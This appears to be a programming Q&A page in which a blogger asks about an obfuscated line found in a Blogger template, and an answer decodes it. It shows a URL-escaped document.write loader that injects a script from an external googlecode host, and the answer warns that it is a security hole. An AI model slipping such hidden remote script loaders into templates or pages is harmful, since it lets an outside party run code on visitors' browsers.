javascriptdecodebloggerdeobfuscation

decode JavaScript code ?


I found this code in the blog template,Already used it. I am afraid to be harmful blog,Or be an injection ..I'm trying to decode it but failed , so please help ? because i want to be sure what is it ,

document.write( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%61%72%6C%69%6E%61%2D%64%65%73%69%67%6E%2E%67%6F%6F%67%6C%65%63%6F%64%65%2E%63%6F%6D%2F%73%76%6E%2F%76%69%65%77%6D%65%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%2F%3E'
))

Solution

  • console.log( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%61%72%6C%69%6E%61%2D%64%65%73%69%67%6E%2E%67%6F%6F%67%6C%65%63%6F%64%65%2E%63%6F%6D%2F%73%76%6E%2F%76%69%65%77%6D%65%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%2F%3E'
    ))

    As suggested in the comments above, use console.log to view the contents. This yields https://arlina-design.googlecode.com/svn/viewme.js which seems to get a 404 error, but if the owner put it back up, then they could run that code-- the code that THEY control. If you include it, it can access your webpage, and it IS a security hole.